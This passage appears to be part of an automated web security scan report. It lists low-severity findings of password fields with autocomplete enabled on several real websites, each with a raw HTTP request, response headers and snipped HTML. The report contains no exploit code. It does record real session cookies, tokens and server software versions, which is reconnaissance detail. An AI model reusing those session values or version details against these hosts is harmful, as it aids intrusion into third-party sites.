<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

12.159. http://www.bostonherald.com/users/register

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

12.160. http://www.bostonherald.com/users/register/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

12.161. http://www.paperg.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
       <input type="hidden" name="ppg" value="1" />
...[SNIP]...
</label>
    <input class="text" id="pass" name="pass" type="password" />
    <br />
...[SNIP]...

12.162. https://www.paperg.com/post.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<div id="login">
   <form id="client-login" action="login.php" method="post">
   <input class="text" name="email" type="text" value="email" onclick="clickclear(this, 'email')" onblur="clickrecall(this,'email')" />
   <input class="text" name="pass" type="password" value="password" onclick="clickclear(this, 'password')" onblur="clickrecall(this,'password')" />
           <input type="image" src="images/rightarrow.png" class="button" />
...[SNIP]...

12.163. https://www.paperg.com/post.php

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /post.php?bid=2123&pid=3922&post HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
</script>
                       
               
                                                                           <form name="campaign_form" enctype="multipart/form-data" action="process.php" method="POST" onsubmit="onFormSubmit();">
                   <input type="hidden" name="owner_id" value="0">
...[SNIP]...
<td>
                               <input type="password" name="login_password" id="login_password" onkeydown="on_login_enter(event);" onchange="saveInput(this.getAttribute( 'name' ));"/>
                               <span id="msg_login_password">
...[SNIP]...
<td>
                               <input maxlength=30 name="account_password" type="password" onchange="saveInput(this.getAttribute( 'name' ));" />
                               <br />
...[SNIP]...
<td>
                               <input maxlength=30 name="account_confirm_password" type="password" />
                               <span id="msg_account_confirm_password">
...[SNIP]...

12.164. http://www.parker-software.com/forum/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.parker-software.com
Path:   /forum/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21920
Content-Type: text/html
Expires: Wed, 26 Jan 2011 13:58:10 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/
Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/
Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...
<td align="right" class="smText">
<form method="post" name="frmLogin" id="frmLogin" action="login_user.asp">Quick Login
<input type="text" size="10" name="name" id="name" style="font-size: 10px;" tabindex="1" />
<input type="password" size="10" name="password" id="password" style="font-size: 10px;" tabindex="2" />
<input type="hidden" name="NS" id="NS" value="1" />
...[SNIP]...

12.165. http://www.parkersoft.co.uk/client.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.parkersoft.co.uk
Path:   /client.aspx

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /client.aspx HTTP/1.1
Host: www.parkersoft.co.uk
Proxy-Connection: keep-alive
Referer: http://www.whoson.com/installable.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 15870
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5w2prj45nmwy3smdwxzc0a45; path=/; HttpOnly
Set-Cookie: whoson=530-50268.8034574; expires=Mon, 28-Mar-2011 23:00:00 GMT; path=/
Date: Fri, 28 Jan 2011 13:57:48 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><meta http-equiv="C
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="client.aspx" id="aspnetForm">
<div>
...[SNIP]...
<br />
<input name="ctl00$ContentMain$txtPassword" type="password" maxlength="100" id="ctl00_ContentMain_txtPassword" style="width:200px;" />&nbsp;&nbsp;
<input type="button" name="ctl00$ContentMain$btnLogin" value="Login" onclick="javascript:__doPostBack('ctl00$ContentMain$btnLogin','')" id="ctl00_ContentMain_btnLogin" />
...[SNIP]...

12.166. http://www.screenthumbs.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=03c0e7391c4e0c2e4a05965642293dcb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a; path=/
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="882dc39daf895399d7dadcc1e174dbe0" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

12.167. http://www.screenthumbs.com/about

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /about

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /about HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="ce27f33fe20b797949d1207d44f9639d" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

12.168. http://www.screenthumbs.com/contact

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /contact

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /contact HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="50be459549d21d9341fab3fe0b1d0200" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

12.169. http://www.screenthumbs.com/forgot

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /forgot

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /forgot HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="b00dd68db5285da7172bb1920113859c" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

12.170. http://www.screenthumbs.com/linkthumbs

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /linkthumbs

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /linkthumbs HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="65a86646a8217df0f2ef44a7bb955261" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

12.171. http://www.screenthumbs.com/plugins

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /plugins

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /plugins HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="1ce092655c1c5cc94b8f807b8f5a51ec" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

12.172. http://www.screenthumbs.com/service

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /service

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /service HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td height="120" colspan="2" align="left" valign="top" class="mcontent">
<form name="login" id="login" action="/login" method="post"><input type="hidden" name="login_token" id="login_token" value="ff365bee989fba6cf76abee1404951ea" />
...[SNIP]...
<td width="92%"><input type="password" maxlength="30" size="20" name="password" id="password" /></td>
...[SNIP]...

12.173. http://www.screenthumbs.com/signup

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /signup

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /signup HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Referer: http://www.screenthumbs.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:53:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br />
<form name="signup" id="signup" action="/signup.php" method="post"><input type="hidden" name="signup_token" id="signup_token" value="53807e321727ceff4a6d8722a59e99fe" />
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password" id="password" /></td>
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password2" id="password2" /></td>
...[SNIP]...

12.174. http://www.screenthumbs.com/signup.php

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.screenthumbs.com
Path:   /signup.php

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /signup.php HTTP/1.1
Host: www.screenthumbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:56:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<br />
<form name="signup" id="signup" action="/signup.php" method="post"><input type="hidden" name="signup_token" id="signup_token" value="f34de5585b9231b896e79b7faac5fb1a" />
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password" id="password" /></td>
...[SNIP]...
<td width="85%"><input type="password" maxlength="30" size="30" name="password2" id="password2" /></td>
...[SNIP]...

12.175. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stylemepretty.com
Path:   /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.stylemepretty.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.16
Vary: Cookie,Accept-Encoding
Set-Cookie: wpmp_switcher=desktop; expires=Sat, 28-Jan-2012 15:06:08 GMT; path=/
X-Pingback: http://www.stylemepretty.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 15:06:08 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
